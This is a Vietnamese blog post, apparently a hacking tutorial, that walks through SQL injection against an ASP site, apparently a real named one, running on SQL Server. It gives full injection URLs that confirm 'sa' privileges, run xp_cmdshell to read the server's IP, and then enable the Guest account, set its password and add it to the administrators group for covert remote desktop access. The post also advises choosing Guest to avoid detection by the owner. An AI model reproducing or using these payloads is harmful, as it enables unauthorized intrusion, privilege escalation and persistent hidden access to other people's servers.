Chủ Nhật, 18 tháng 11, 2012
Cách tạo user để remote desktop khi có quyền Sa
Đầu tiên thì ta cần phải có đc victim
http://www.domain.com/product_category.asp?categoryL1=106'
Lỗi
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '106'order by mscategory.L2order, mssubcategories.L3order'.
/side_nav_02.asp, line 27
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '106'order by mscategory.L2order, mssubcategories.L3order'.
/side_nav_02.asp, line 27
Tiếp theo là ta phải kiểm tra xem nó có quyền sa ko? ta sử dụng cậu lệnh sau:
Code:
http://www.domain.com/product_category.asp?categoryL1=106%27and%201=convert%28int,system_user%29--sp_password
Và ta được kết quả như sau:
Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.
Như này là dính Sa rồi đó
Công việc tiếp theo là ta
là đổ lệnh ip config vào table đẻ check ip server, cũng có thể bỏ qua bước này
Code:
http://www.Domain.com/product_category.asp?categoryL1=106';drop table abc create table abc (id int identity,nd varchar(1000)) insert into abc(nd) exec master..xp_cmdshell 'ipconfig'--sp_password
Như vậy là ta đã tạo đc 1 table mang tên A_ShiNiChi_VHC
Sau đó ta sẽ convert nó để xem ip là gì nhé
Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106%27and%201=convert%28int,%28select%20top%201%20nd%20from%20abc%20where%20nd%20like%20%28%27%25Ip%20address%25%27%29%29%29--sp_password
Ra Ip rồi nè
Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 67.43.167.119 ' to a column of data type int.
Tiếp theo thì mình sẽ tạo user và active nó, nâng quyền ngang với administrator để remote.
Thường thường thì Computer sẽ có thêm 1 user mặc định nữa đó là Guest.
Vì thế Shi sẽ chọn nó như vậy thì khi remote hoặc làm gì đỡ bị thằng chủ server phát hiện
Lưu ý: nếu remote xong rồi thì sau khi ko sử dụng nó nữa thì bạn nên Log off đi
1/ Tạo account Guest và active nó
Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106;exec master..xp_cmdshell 'net user guest /active:yes';--sp_password
2/ Tạo pass cho acc guest
Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106';exec master..xp_cmdshell 'net user guest 123456';--sp_password
Ở đây "123456" là pass
3/ Nâng quyền cho acc guest
Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106';exec master..xp_cmdshell 'net localgroup administrators guest /add';--sp_password
Như vậy là đã xong rồi
Chuyên Mục:
Hacking and Security,
SQL Injection
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: